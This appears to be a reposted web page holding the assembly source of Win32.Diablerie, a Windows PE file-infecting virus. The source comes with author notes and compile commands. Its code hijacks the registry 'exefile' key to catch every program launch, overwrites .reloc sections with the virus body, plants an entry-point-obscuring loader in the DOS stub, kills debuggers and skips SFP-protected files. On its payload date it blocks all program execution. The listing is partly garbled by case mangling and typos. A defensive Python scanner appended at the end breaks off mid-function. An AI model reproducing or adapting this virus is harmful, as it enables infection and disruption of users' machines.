Win32.Diablerie.asm

xiaoxiao2021-03-05  23

Comment $


Version: 0.7
Author: Dr. Watcom (Valencia / Spain)
Compiler: Borland Turbo Assembler (version 5.0r / 32-bit)
Type: PE infector (relocations overwriter)
Platform: Intel 80386 processor and compatibles
Systems: Win95, Win98, WinMe, WinNT, Win2k
Size: 2848 bytes
Sys hooking: changes the 'exefile' registry key to trap EXE file execution
Encryption: not implemented (maybe next version ...)
EPO: virus code is run from a loader within the stub, using SEH
Anti-AV: not implemented.
Anti-bait: does not infect tiny files (with relocations
Anti-debug: detects app-level debuggers, tries to kill them with SEH
Payload: on 01/11 denies all program execution, shows credits


This is my second virus and it's a bit lame yet, as it has no
polymorphic engine and even uses no encryption, but I think it
implements a couple of nifty things: it obscures the entrypoint
by clearing it in the header, so the victims get executed from
the very beginning of the file (including the 'MZ' signature !!)
and then jump to a loader located in the DOS stub code, which is
redone to keep compatibility (so running victims under MS-DOS
gives no error). This loader passes control to the virus using
a SEH frame to jump.

The virus changes the 'HKCR\exefile\shell\open\command' key
to trap any program which gets executed, and then infects it by
overwriting the .reloc section. It also detects (and tries to kill)
application-level debuggers.

The payload is very lame: only a message box showing the
credits and denying all program execution on 01/11. The payload
text (as the virus name) was inspired by the roleplaying game
"Vampire: The Masquerade" (of course, the *real* game, not the
computer one !!)

.Compilation.

(Why would anybody want to compile this?)

tasm32 /m /ml diablerie.asm
tlink32 /Tpe /aa /c diablerie.obj, diablerie.exe, import32.lib
pewrite diablerie.exe

$

; -------------------------------
; Preprocessor
; -------------------------------

.386; instruction set to be used

.Model flat; no segmentation!

Include Win32.inc; Windows Structures and Constants

INCLUDE MZ_PE.INC; DOS (MZ) & Win32 (PE) EXE LAYOUT

EXTRN EXITPROCESS: Proc; Some Apis Used by Fake Host Code

EXTRN MessageBoxa: proc;

EXTRN_WSPRINTFA: PROC

; -------------------------------
; Useful equates and macros
; -------------------------------

Debug Equ true; True -> Do Not Infect Files

CRLF EQU <13, 10>

SPAWN_NAME EQU <'MSDIAB.EXE'>

Virus_name EQU <'Win32.Diablerie'>

Virus_version EQU <'V0.7'>

Virus_size equ end - start

Opcode_jmp_short Equ 0ebh

PayLoad_Month EQU 11

PayLoad_day EQU 1

KERNEL32_WIN9X EQU 0BFF70000H; Hardcoded Values, In Case We don't

KERNEL32_WINNT EQU 077F00000H; Find kernel32 by Other Ways. Those

KERNEL32_WIN2K EQU 077E00000H; Values ​​Are Ten Checked Using SEH

KERNEL32_WINME EQU 0BFF60000H; Before Using Them, To Avoid Pf's

API Macro Name

Call [EBP NAME]

ENDM

PUT_SEH_HANDLER MACRO LABEL

Local @@ Skip_Handler

Call @@ Skip_Handler

MOV ESP, [ESP 08H]

JMP Label

@@ Skip_Handler:

XOR EDX, EDX

Push DWORD PTR FS: [EDX]

MOV DWORD PTR FS: [EDX], ESP

ENDM

Restore_seh_handler macro

XOR EDX, EDX

POP DWORD PTR FS: [EDX]

POP EDX

ENDM

Generate_Exception Macroxor EDX, EDX

Div EDX

ENDM

Strlen Macro

Push EAX

PUSH ESI

Push EDI

Mov EDI, ESI

XOR ECX, ECX

Dec ECX

XOR EAX, EAX

Repne scaSB

MOV ECX, EDI

Sub ECX, ESI

POP EDI

POP ESI

POP EAX

ENDM

; -------------------------------
; Host data
; -------------------------------
; This data is used only by first-generation fake host code

.DATA

Sztitle DB Virus_name, 0

SzTemplate DB 'Virus', Virus_Name, '', Virus_Version, '', 'Has Been Activated.', CRLF

DB 'Current Virus Size IS% I Bytes (0x% X Bytes).', CRLF, CRLF

DB 'Have a nice day.', 0

SZBAIT DB 'Bait1.exe', 0

; -------------------------------
; Virus code
; -------------------------------

.code

Start:

; -------------------------------
; Setup everything
; -------------------------------

Call getdelta; trivial stuff, don't you think?

GetDelta:; OK, I'll Explain: this way you can

POP EBP; get the code displacement (a.k.a.

Sub EBP, OFFSET GETDELTA; DELTA OFFSET

Test EBP, EBP

JZ FirstGenentry

MOV ESP, [ESP 08H]

Restore_seh_handler

MOV EAX, [EBP FILE_ENTRYPOINT]; Original EP (Saved During Infection)

MOV [EBP HOSTENTRY], EAX; Store IN A Safe Place

Firstgenentry:

CLD; We don't like surprises ...

Mov ESI, [ESP]; To Find Kernel32 We Will Use T

Call Findkernel32; RET Address in the stack, wich

JC Returntohost; (Hopefully) Will Point Into IT

Call LocateApis

JC Returntohost

Push size process_information;

Push GMEM_FIXED or GMEM_ZEROINIT;

API GLOBALLOC;

MOV [EBP ProcessInfo], EAX;

Push size startupinfo;

Push GMEM_FIXED or GMEM_ZEROINIT; API GLOBALLOC;

MOV [EBP STARTUPINFO], EAX;

Mov [eax.si_size], Size Startupinfo

Push EAX

API GetStartupinfo; Get Our Startup Information

Test EBP, EBP

JZ Fakehost

; -------------------------------
; Hands on !!!
; -------------------------------

Call RNG_INIT; INIT The Random Number Generator

Call detectdebuggers

JC Returntohost

Call ParseCommandline

JNC EXECUTEDFROMREG

Call setupReghook

JMP Returntohost

ExecuteFromReg:

MOV ESI, [EBP CMDexefile]

IF Debug

Push 1040h

Lea Edx, [EBP SZVIRUSNAME]

Push Edx

PUSH ESI

Push null

API MessageBox

Else

Call infectfile

ENDIF

SUB ESP, Size SystemTime

MOV ESI, ESP

PUSH ESI

API GetSystemTime

Add ESP, Size SystemTime

CMP [ESI.ST_MONTH], payload_month

JNE EXECUTEVICTIM

CMP [ESI.ST_DAY], PayLoad_day

JNE EXECUTEVICTIM

Push 1040h

Lea Edx, [EBP SZVIRUSNAME]

Push Edx

Lea Edx, [EBP SZVIRUSCREDITS]]

Push Edx

Push null

API MessageBox

IF Debug

Else

JMP EXITTOWINDOWS

ENDIF

Executevictim:

MOV ESI, [EBP CMDspAwn];

MOV EBX, [EBP ProcessInfo]; Must Execute Our Command Line

MOV EDX, [EBP Startupinfo]; AS A New Process

XOR EAX, EAX

Push EBX

Push Edx

Push EAX

Push EAX

Push EAX

Push EAX

Push EAX

Push EAX

PUSH ESI

Push EAX

API CREATEPROCESS

Exittowindows:

PUSH 0

API EXITPROCESS_

Returntohost:

Test EBP, EBP

JZ Fakehost_quit

Push [EBP HOSTENTRY]

RET

; -------------------------------
; Virus subroutines
; -------------------------------

DetectDebuggers

Findkernel32

LocateApis

ParseCommandline

SetupReghook

; -------------------------------
; DetectDebuggers
; -------------------------------
; Detects application-level debuggers and tries to kill them with SEH
;
; Output:
;   Carry flag -> set if debugger persists, clear if not

DetectDebuggers:

Pushhad

PUT_SEH_HANDAL FD_CONTINUE; Use SEH TO KILL Debuggers

XOR Eax, Eax; Generate A Exception (Divide By 0)

Div EAX;

Restore_seh_handler; Here Some Abnormal Occured

JMP fd_debugger_found; so lets quit

FD_CONTINUE:; Execution SHOULD RESUME AT THIS PNT

Restore_seh_handler; Remove Handler

Mov Eax, FS: [20h]; Detect Application-Level Debugger

TEST EAX, EAX; is present?

JNZ FD_DEBUGGER_FOUND; Quit!

Popad; No Debuggers Found, So Restore

Clc; Registers, Clear Carry Flag and

Ret; return!

FD_DEBUGGER_FOND:

Popad

STC

RET

; -------------------------------
; FindKernel32
; -------------------------------
; Tries to find kernel32 base address by scanning back from a certain address
; and, if that fails, by using some hardcoded value
;
; Input:
;   ESI -> must point somewhere into kernel32
; Output:
;   var kernel32 -> will point to kernel32 base address
;   Carry flag -> set on error

Findkernel32:

Pushhad

And ESI, 0FFFFF0000h

MOV ECX, 100H

FK32_LOOP:

Call Tryaddress

JNC FK32_SUCCESS

SUB ESI, 010000H

Loop fk32_loop

FK32_hardcodes:

Mov ESI, KERNEL32_WIN9X

Call Tryaddress

JNC FK32_SUCCESS

MOV ESI, KERNEL32_WINNT

Call Tryaddress

JNC FK32_SUCCESS

Mov ESI, kernel32_win2k

Call Tryaddress

JNC FK32_SUCCESS

Mov ESI, KERNEL32_WINME

Call Tryaddress

JNC FK32_SUCCESS

FK32_fail:

Popad

STC

RET

FK32_SUCCESS:

MOV [EBP KERNEL32], ESI

Popad

CLC

RET

; -------------------------------
; LocateApis
; -------------------------------
; Gets all API addresses that our virus needs
;
; Output:
;   Carry flag -> set on error, clear on success

LocateApis:

Pushhad

MOV EBX, [EBP KERNEL32]; Having found kernel32, we will get
Lea ESI, [EBP KERNEL_API_CRC32]; an array of API addresses by their

LEA EDI, [EBP KERNEL_API_ADDR]; Names CRC32, Scanning The Kernel32

Call getapiarray; export table

JC la_fail;

Lea Edx, [EBP SZUSER32]; More Api's! This Time We Call

Push Edx; LoadLibrary TO GET USER32

API LoadLibrary; Call API

MOV EBX, EBX; EBX -> Module Handle

Lea ESI, [EBP USER_API_CRC32]; ESI -> Pointer to CRC32 TABLE

Lea EDI, [EBP User_API_ADDR]; EDI -> Where to Store Addresses

Call getapiarray; Call Our Procedure

JC la_fail; Any Problem? if So, Bail Out

Lea Edx, [EBP SZADVAPI32]; more API's!

Push EDX;

API loadLibrary;

MOV EBX, EAX;

Lea ESI, [EBP Advapi_API_CRC32];

Lea EDI, [EBP Advapi_API_ADDR];

Call getapiarray;

JC la_fail; Any Problem? if So, Bail Out

La_success:

Popad

CLC

RET

La_fail:

Popad

STC

RET

; -------------------------------
; ParseCommandLine
; -------------------------------
; Parses our command line and checks for special params
;
; Output:
;   var cmdline
;   var cmdspawn
;   var cmdexefile
;   Carry flag -> set if no special param found, clear otherwise

PARSECMMAndline:

Pushhad

XOR EAX, EAX

MOV [EBP CMDSPAWN], EAX

MOV [EBP CMDEXEFILE], EAX

API getcommandline; get outcomman

MOV [EBP CMDLINE], EAX; Save IT

Mov ESI, EAX;

Call getnextParam;

JC PCL_QUIT;

Lodsb

Dec Al

JNZ PCL_QUIT

MOV [EBP CMDSPAWN], ESI

Strlen

Push ECX

Push GMEM_FIXED

API GLOBALLOC

MOV [EBP CMDEXEFILE], EAX

Mov Edi, EAX

Strlen

REP MOVSB

MOV ESI, [EBP CMDexefile]

Call getNextParam

JC PCL_QUIT

Dec ESI

MOV Byte Ptr [ESI], 0

Popad

CLC

RET

PCL_QUIT: POPAD

STC

RET

; -------------------------------
; SetupRegHook
; -------------------------------
; Copies our host to the Windows directory and changes the 'exefile' key in the registry

SetupReghook:

Pushhad

SUB ESP, MAX_PATH

MOV ESI, ESP

SUB ESP, MAX_PATH

MOV EDI, ESP

PUSH MAX_PATH

Push EDI

API GetWindowsDirectory

Lea Edx, [EBP SZSPAWNFILE]

Push Edx

Push EDI

API LSTRCAT

PUSH MAX_PATH

PUSH ESI

Push null

API getModuleFileName

Push False

Push EDI

PUSH ESI

API COPYFILE

Lea ESI, [EBP SzregValue]

Lea EDI, [EBP Szregkey]

Mov Edx, HKEY_CLASS_ROOT

Call ChangeRegstring

Add ESP, MAX_PATH MAX_PATH

Popad

RET

; -------------------------------
; Virus functions
; -------------------------------

ChangeRegstring

GetApiaddress

Getapiarray

GetCrc32

GetNextParam

Tryaddress

; -------------------------------
; ChangeRegString
; -------------------------------
; Shortcut to change a registry string
;
; Input:
;   EDI -> pointer to key to be changed
;   ESI -> pointer to key value
;   EDX -> hKey (root key handle)

Changeregstring:

Pushhad

SUB ESP, 4

MOV EBX, ESP

Push EBX

Push Key_All_Access

PUSH 0

Push EDI

Push Edx

API RegopenKeyex

Strlen

Dec ECX

Push ECX

PUSH ESI

Push reg_sz

Push null

Push DWORD PTR [EBX]

API RegSetValue

Push DWORD PTR [EBX]

API Regclosekey

Add ESP, 4

Popad

RET

; -------------------------------
; GetApiAddress
; -------------------------------
; Tries to get an API address by its CRC32 from the given module export table
;
; Input:
;   ESI -> module handle
;   EDX -> API's CRC32
; Output:
;   EAX -> API's address
;   Carry flag -> set on error, clear on success

Getapiaddress:

Pushhad

Mov EDI, ESI

Add ESI, [EDI.MZ_LFANEW]

Add ESI, 078H

Lodsd

Add Eax, EDI

Mov ESI, EAX

Mov Eax, [ESI.ed_NumberOfnames]]

MOV [EBP ET_MAXNAMES], EAX

MOV EAX, [ESI.ed_addressofnames]

Add Eax, EDI

MOV [EBP ET_PTRNAMES], EAX

Mov Eax, [ESI.ed_addressoffunctions]

Add Eax, EDI

MOV [EBP ET_PTRADDRESSSS], EAX

Mov Eax, [ESI.ed_addressOfNameRDINALS]

Add Eax, EDI

MOV [EBP ET_PTRORDINALS], EAX

MOV ESI, [EBP ET_PTRNAMES]]

MOV ECX, [EBP ET_MAXNAMES]]

XOR EAX, EAX

MOV [EBP Count], EAX

GA_GETNAMEPTR:

JECXZ GA_FAIL

Lodsd

PUSH ESI

Add Eax, EDI

Mov ESI, EAX

XOR EBX, EBX

Push ECX

Strlen

Call getCrc32

POP ECX

CMP EAX, EDX

JNE GA_NEXT

MOV ECX, [EBP Count]

MOV ESI, [EBP ET_Ptrordinals]

SHL ECX, 1

Add ESI, ECX

XOR EAX, EAX

Lodsw

Mov ESI, [EBP ET_PTRADDRESSESSSSS]]

SHL EAX, 2

Add ESI, ESI

Lodsd

Add Eax, EDI

MOV [EBP ET_TMPADDRESS], EAX

JMP GA_SUCCESS

GA_NEXT:

POP ESI

Dec ECX

INC [EBP Count]

JMP GA_GETNAMEPTR

GA_SUCCESS:

POP ESI

Popad

MOV EAX, [EBP ET_TMPAddress]

CLC

RET

GA_FAIL:

Popad

STC

RET

; -------------------------------
; GetApiArray
; -------------------------------
; Gets an array of API addresses from the given module
;
; Input:
;   ESI -> points to an array of CRC32 values, ending with a null dword
;   EDI -> points to destination of the address array
;   EBX -> module handle
; Output:
;   Carry flag -> set on error, clear on success

Getapiarray:

Pushhad

GAA_LOOP:

Lodsd

Test Eax, EAX

JZ GAA_SUCCESS

Mov Edx, EAX

PUSH ESI

MOV ESI, EBX

Call getapiaddress

JC GAA_FAIL

Stosd

POP ESI

JMP GAA_LOOP

GAA_SUCCESS:

Popad

CLC

RET

GAA_FAIL:

Popad

STC

RET

; -------------------------------
; GetCrc32
; -------------------------------
; Computes CRC32 checksum of the given data
;
; Input:
;   ESI -> pointer to data
;   ECX -> size of data in bytes
; Output:
;   EAX -> CRC32 checksum

GetCrc32:

Pushhad

Mov Edi, ECX

XOR ECX, ECX

Dec ECX

MOV EDX, ECX

CRC32_NEXTBYTE:

XOR EAX, EAX

XOR EBX, EBX

Lodsb

XOR Al, Cl

MOV CL, CH

MOV CH, DL

MOV DL, DH

MOV DH, 8

CRC32_NextBit:

SHR BX, 1

RCR AX, 1

JNC CRC32_NOCRC

XOR AX, 08320H

XOR bx, 0edb8h

CRC32_NOCRC:

DEC DH

JNZ CRC32_NEXTBIT

XOR ECX, EAX

XOR EDX, EBX

Dec Edi

JNZ CRC32_NEXTBYTE

Not Edx

NOT ECX

MOV EAX, EDX

ROL EAX, 16

MOV AX, CX

MOV [EBP CRC32], EAX

Popad

MOV EAX, [EBP CRC32]

RET

; -------------------------------
; GetNextParam
; -------------------------------
; Moves ESI pointer to next parameter in a commandline-type string
; Uses SEH to avoid possible protection faults
;
; Input:
;   ESI -> pointer to a commandline-type string
;
; Output:
;   ESI -> points to next parameter
;   Carry flag -> set if string terminated, clear on success

GetNextParam:

Push EAX

Push ECX

PUT_SEH_HANDLER GNP_FAIL

MOV CL, 20H; Character to Match (Space)

GNP_SKIPSPACES:

Lodsb;

TEST Al, Al;

JZ GNP_FAIL; if Al is Zero, String Was Terminated

CMP Al, CL;

Je gnp_skipspaces; there is recent spacs, loop ON

CMP Al, 22H; First CHAR IS A Quote?

JNE GNP_FIND; NO: WE MUST FIND A SPACE

MOV CL, 22H; YES: WE MUST FIND The Closing Quote

GNP_Find:

Lodsb

Test Al, Al

JZ GNP_FAIL

CMP AL, CL

JNE GNP_FIND

Restore_seh_handler

POP ECX

POP EAX

CLC

RET

GNP_fail:

Restore_seh_handler

POP ECX

POP EAX

STC

RET

; -------------------------------
; TryAddress
; -------------------------------
; Checks if ESI points to a valid PE base address (useful to find kernel32),
; Uses SEH to avoid possible faults, so the address may be anything
;
; Input:
;   ESI -> address to try
; Output:
;   Carry flag -> set on error, clear on success

TryAddress:

Pushhad

PUT_SEH_HANDLER TA_FAIL

CMP Word PTR [ESI], 'ZM'

JNE TA_FAIL

Add ESI, [ESI.MZ_LFANEW]

CMP Word PTR [ESI], 'EP'

JE TA_SUCCESS

TA_SUCCESS:

Restore_seh_handler

Popad

CLC

RET

TA_FAIL:

Restore_seh_handler

Popad

STC

RET

; -------------------------------
; Randomizing functions
; -------------------------------

; -------------------------------
; RNG_Init
; -------------------------------
; Initialise the random number generator
;

RNG_INIT:

Pushhad

API GettickCount

MOV [EBP RNDSEED_1], EAX

ROL Eax, 3

MOV [EBP RNDSEED_2], EAX

ROL Eax, 3

MOV [EBP RNDSEED_3], EAX

ROL Eax, 3

MOV [EBP RNDSEED_4], EAX

ROL Eax, 3

MOV [EBP RNDSEED_5], EAX

ROL Eax, 3

MOV [EBP RNDSEED_6], EAX

Popad

RET

; -------------------------------
; RNG_GetRandom
; -------------------------------
; Returns a 32-bit random number
;
; Output:
;   EAX -> random number

RNG_GETRANDOM:

Push Edx

MOV EAX, [EBP RNDSEED_1]

Mov Edx, [EBP RNDSEED_2]

XOR EAX, [EBP RNDSEED_3]

XOR EDX, [EBP RNDSEED_4]

SHRD EAX, EDX, 11H

Push EAX

MOV EAX, [EBP RNDSEED_5]

MOV EDX, [EBP RNDSEED_6]

And Eax, 0FFFFFFEH

Add [EBP RNDSEED_1], EAX

ADC [EBP RNDSEED_2], EDX

INC DWORD PTR [EBP RNDSEED_3]

Inc DWORD PTR [EBP RNDSEED_4]

POP EAX

POP EDX

RET

; -------------------------------
; RNG_GetRandomRange
; -------------------------------
; Returns a random number from 0 to [EAX - 1]
;
; Input:
;   EAX -> maximum random number to get + 1
;
; Output:
;   EAX -> random number

RNG_GETRANDOMRANGE:

Push EBX

MOV EBX, EAX

Call RNG_Getrandom

RNG_R_LOOP:

CMP EAX, EBX; Now, Keep Result in the Given Range

JL RNG_R_OK; It's in range, so we can return
SHR EAX, 1; It's not. We divide it by 2 and

JMP RNG_R_LOOP; Loop To Compare Again

RNG_R_OK:

POP EBX

Ret; return!

; -------------------------------
; Infection code
; -------------------------------

; -------------------------------
; InfectFile
; -------------------------------
; Infects a portable executable by overwriting the .reloc section
;
; Input:
;   ESI -> points to filename to infect
;

Infectfile:

Pushhad

MOV [EBP FileName], ESI

MOV [EBP FILINFECTED], FALSE

Mov EDI, ESI

Mov ECX, MAX_PATH

XOR EAX, EAX

CLD

RepNZ scaSB

MOV EAX, [EDI-5]

OR EAX, 20202000H

CMP EAX, 'EXE.'

JNE IF_QUIT

; Avoid System File Protection

Lea EDX, [EBP SZSFC]; We Have to Avoid Win2k / WinMe SFP

Push Edx; Push a Pointer To Library Name

API LoadLibrary; loading it

Test Eax, Eax; if The Library Doesn't EXIST, WE

JZ if_notprotected; Can Safely Ignore SFP

Lea Edx, [EBP SZSFCPROC]; Pointer To Function Name

Push EDX; Push IT

Push Eax; Push Module Handle

API GetProcaddress; Call API

Test Eax, Eax; No Function with That Name, SO WE

JZ if_notprotected; Proceed to Infection

Push ESI; Pointer to Victim's FileName

Push null; this parameter must be null

Call Eax; Call SfcisfileProtected

Test Eax, Eax; NOT Protected? Go Ahead, Continue

JZ if_notprotected; with infection

JMP if_quit; File Protected, WE Must Quit

; Save file attributes and remove them

IF_notprotaced:

Push ESI; POINTS to FileName

API getFileAttributes; Call API

MOV [EBP FileAttribs], EAX; Save Attributes for Later USE

Push file_attribute_normal; now we change the attributes of there

Push ESI; File to FILE_ATTRIBUTE_NORMAL
API SetFileAttributes; Call API

; Open a handle to the file

IF_OpenFile:

XOR EAX, EAX

Push EAX

Push EAX

Push Open_EXISTING

Push EAX

Push file_share_read

Push generic_read or generic_write

PUSH ESI

API CREATEFILE

INC EAX

JZ if_restorettribs

Dec EAX

MOV [EBP FILEHANDLE], EAX

; Save creation / access / modify times

Lea Edx, [EBP FileTime_Written]

Push Edx

Lea Edx, [EBP FileTime_accessed]

Push Edx

Lea Edx, [EBP FileTime_created]

Push Edx

Push [EBP FILEHANDLE]

API GetFileTime

; Save file size

Push null

Push [EBP FILEHANDLE]

API GetFileSize

MOV [EBP FileSize], EAX

; Open a file mapping object

IF_createmapping:

XOR EAX, EAX

Push EAX

Push [EBP FileSize]

Push EAX

Push Page_Readwrite

Push EAX

Push [EBP FILEHANDLE]

API CREATEFILEMAPPING

Test Eax, EAX

JZ if_closefile

MOV [EBP FILEMAPPING], EAX

; Map a view of the file

IF_createview:

XOR EAX, EAX

Push DWORD PTR [EBP OFFSET FileSize]

Push EAX

Push EAX

Push file_map_all_access

Push [eBP filemapping]

API MapViewoffile

Test Eax, EAX

JZ if_closemapping

MOV [EBP FILEVIEW], EAX

Mov ESI, EAX

; Check for MZ / PE signatures

CMP Word PTR [ESI], 'ZM'

JNE IF_Closemapping

Add ESI, [ESI.MZ_LFANEW]

CMP Word PTR [ESI], 'EP'

JNE IF_Closemapping

; Check for space for the EPO loader

MOV ESI, [EBP FILEVIEW]

Mov EDI, ESI

Add ESI, [ESI.MZ_LFANEW]

SUB ESI, EDI

SUB ESI, SIZE Image_DOS_HEADER

CMP ESI, SIZE_EPO_LOADER

JL if_closeview

; Find '.reloc' section

MOV ESI, [EBP FILEVIEW]
Add ESI, [ESI.MZ_LFANEW]

Movzx Eax, Word Ptr [ESI.FH_NUMBEROFSECTIONS]]

MOV [EBP File_SEctions], EAX

Add ESI, SIZE_FILE_HEADER

Mov Eax, [ESI.OH_IMAGEBASE]

MOV [EBP FILE_IMAGEBASE], EAX

Mov Eax, [ESI.OH_ADDRESSOFENTRYPOINT]

Add Eax, [EBP FILE_IMAGEBASE]

MOV [EBP FILE_ENTRYPOINT], EAX

Mov Eax, [ESI.OH_Numberofrvaandsizes]

Imul ECX, EAX, SIZE Image_DATA_DIRECTORY

Add ESI, SIZE_OPTIONAL_HEADER

Add ESI, ECX

MOV EAX, [EBP File_SEctions]

IF_TRYSECTION:

CMP DWORD PTR [ESI], 'Ler.'

JNE IF_NEXTSECTION

Add ESI, 2

CMP DWORD PTR [ESI], 'Cole'

JNE IF_NEXTSECTION

SUB ESI, 2

JMP if_foundrelocs

IF_NEXTSECTION:

Dec EAX

Test Eax, EAX

JZ if_closeview

Add ESI, SIZE_SECTION_HEADER

JMP if_trysection

IF_Foundrelocs:

CMP [ESI.SH_SIZEOFRAWDATA], Virus_Size

JL if_closeview

CMP [ESI.SH_CHARACTERISTICS], /

Image_scn_cnt_code or image_scn_mem_execute or image_scn_mem_write

JE if_closeview

MOV [EBP File_SECTIONHEADER], ESI

Mov Eax, [ESI.SH_VIRTUALADDRESS]

MOV [EBP File_SECTIONRVA], EAX

Mov Eax, [ESI.SH_POINTERTORAWDATA]

MOV [EBP File_SECTIONRAW], EAX

Mov Eax, [ESI.SH_SIZEOFRAWDATA]

MOV [EBP File_SEctionsize], EAX

; Copy virus body

IF_copyvirusbody:

Mov Edi, [EBP File_SECTIONRAW]

Add Edi, [EBP FILEVIEW]

Lea ESI, [EBP START]

MOV ECX, Virus_Size

CLD

REP MOVSB

MOV ECX, [EBP File_SEctionsize]

Sub ECX, Virus_size

XOR EAX, EAX

Rep Stosb

; Insert EPO loader into DOS header / stub

IF_INSERTLOADER:

XOR EAX, EAX

MOV EDI, [EBP FileView]; Start of File

MOV [edi.mz_ip], ax; clear dos entry point

MOV [edi.mz_lfarlc], ax; clear dos relocations
add edi, 2; skip 'MZ' signature

Mov al, opcode_jmp_short; setup a jmp silk

Stosb; Insert JMP Short Opcode

Mov Eax, size image_dos_header; Calc Destination: After MZ Header

Add Eax, 2; Skipping First 2 bytes of Code

SUB Al, 4; But Relative to Next Eip!

Stosb; INSERT Displacement Byte

MOV EAX, [EBP File_ImageBase]; Calculate Virus Entry Point:

Add Eax, [EBP File_SECTIONRVA]; Image Base Virus Section RVA

Lea Edx, [EBP Entrypoint]; Save Virus Entry Point Into Our

MOV [EDX], EAX; Loader Code

MOV EDI, [EBP FileView]; Start of File

Add Edi, Size Image_DOS_HEADER; Go Beyond Mz Header

Lea ESI, [EBP EPOLOADER]; Address of Our Loader Code

MOV ECX, SIZE_EPO_LOADER; SIZE OF CODE

Rep Movsb; Store It!

; Update headers

If_updateheaders:

MOV EDI, [EBP FILEVIEW]

Add edi, [edi.mz_lfanew]

Add Edi, Size Image_File_Header

XOR Eax, Eax; Clear Entry Point (Reset to Zero)

MOV [edi.oh_addressofentryPoint], EAX

MOV ESI, [EBP File_SECTIONHEADER]

MOV [ESI.SH_CHARACTERISTICS], /

Image_scn_cnt_code or image_scn_mem_execute or image_scn_mem_write

MOV [EBP FILINFECTED], TRUE; Infection Complete

; Unmap the view

IF_closeview:

Push [EBP FILEVIEW]

API UnmapViewoffile

; Close the file mapping object

IF_closemapping:

Push [eBP filemapping]

API CloseHandle

; Close the file handle, restore times

IF_closefile:

IF Debug

Push [EBP FILEHANDLE]

API CloseHandle

Else

Lea Edx, [EBP FileTime_Written]

Push Edx

Lea Edx, [EBP FileTime_accessed]

Push Edx

Lea Edx, [EBP FileTime_created]

Push Edx
Push [EBP FILEHANDLE]

API setFiletime

Push [EBP FILEHANDLE]

API CloseHandle

ENDIF

; Restore the file attributes

IF_RESTOREATTRIBS:

Push [EBP FileAttribs]]

Push [EBP FileName]

API setFileAttributes

IF_quit:

Popad

RET

; -------------------------------
; EPO - stub program
; -------------------------------
; Code to replace victim's DOS stub
;

Epoloader:

DB 0ebh; JMPS ...

DB MSDOS_CODE-WIN32_CODE; (Relative Displacement)

WIN32_CODE:

DB 052H; Push EDX

DB 045H; INC EBP

DB 068H; Push ...

EntryPoint:

DD 000000000H;

DB 033H, 0C0H; XOR EAX, EAX

DB 064H, 0FFH, 030H; Push FS: [EAX]

DB 064H, 089H, 020H; MOV FS: [EAX], ESP

DB 0F7H, 0F0H; DIV EAX

MSDOS_CODE:

DB 0BAH; MOV DX ...

DW MSDOS_STRING-EPOLOADER; (Offset String)

DB 00EH; PUSH CS

DB 01FH; POP DS

DB 0B4H, 009H; MOV AH, 09

DB 0CDH, 021H; INT 21

DB 0B8H, 001H, 04CH; MOV AX, 04C01

DB 0CDH, 021H; INT 21

MSDOS_STRING:

; DB 'this Program Requires Microsoft Windows.'

DB 'this Program Cannot Be Run in dos mode.'

; DB 'this Program Must Be Run Under Win32.'

; AARGH! I need more space!

DB 'this Program Needs Win32'

DB CRLF, '$', 0

EPOLOADER_END:

SIZE_EPO_LOADER EQU EPOLOADER_END - EPOLOADER
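A defender-side counterpart to InfectFile and the stub layout above, added here and not part of the virus source: a Python scanner that looks for the static traces the infection leaves in a PE file (the JMP SHORT patched over the MZ header with e_lfarlc zeroed, the SEH loader bytes and message string in the DOS stub, AddressOfEntryPoint cleared to zero, and a .reloc section re-flagged CODE|EXECUTE|WRITE). The sample images it scans are constructed inside the block; the marker names and the build_sample helper are my own, not from the page.

```python
import struct

# Section flags the infector sets on the hijacked .reloc section
# (image_scn_cnt_code or image_scn_mem_execute or image_scn_mem_write).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RELOC_EXEC_WRITE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
OPCODE_JMP_SHORT = 0xEB
# Bytes of the EPO loader at file offset 0x42 (push edx / inc ebp / push imm32)
# and at 0x49 (xor eax,eax / push fs:[eax] / mov fs:[eax],esp / div eax).
LOADER_HEAD = b"\x52\x45\x68"
LOADER_SEH_TAIL = b"\x33\xC0\x64\xFF\x30\x64\x89\x20\xF7\xF0"
STUB_MSG = b"This program needs Win32"


def scan_pe(data: bytes) -> list:
    """Return the Diablerie-style markers found in a PE image (empty list = none)."""
    findings = []
    if len(data) < 0x40 or data[:2] != b"MZ":
        return findings
    e_lfarlc = struct.unpack_from("<H", data, 0x18)[0]
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # 'MZ' decodes as dec ebp / pop edx; the jmp short patched at offset 2 then
    # skips the rest of the header, and the infector zeroes e_lfarlc (0x18).
    if e_lfarlc == 0 and data[2] == OPCODE_JMP_SHORT:
        findings.append("jmp_short_in_mz_header")
    if data[0x42:0x45] == LOADER_HEAD and data[0x49:0x53] == LOADER_SEH_TAIL:
        findings.append("seh_loader_in_dos_stub")
    if STUB_MSG in data[0x40:e_lfanew]:
        findings.append("diablerie_dos_stub_string")
    if e_lfanew + 44 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return findings
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    entry_point = struct.unpack_from("<I", data, e_lfanew + 40)[0]
    if entry_point == 0:  # weak alone: some DLLs legitimately have no entry point
        findings.append("entry_point_zero")
    sect = e_lfanew + 24 + opt_size
    for _ in range(num_sections):
        if sect + 40 > len(data):
            break
        name = data[sect:sect + 8].rstrip(b"\0")
        chars = struct.unpack_from("<I", data, sect + 36)[0]
        if name == b".reloc" and chars & RELOC_EXEC_WRITE == RELOC_EXEC_WRITE:
            findings.append("reloc_section_code_exec_write")
        sect += 40
    return findings


def build_sample(infected: bool) -> bytes:
    """Construct a minimal, non-runnable PE image, optionally carrying the markers."""
    e_lfanew = 0x80
    img = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<H", img, 0x18, 0x40)            # e_lfarlc as a linker leaves it
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img += b"\0" * (e_lfanew - len(img))               # DOS stub area
    img += b"PE\0\0"
    img += struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, 0x1000)            # AddressOfEntryPoint
    img += opt
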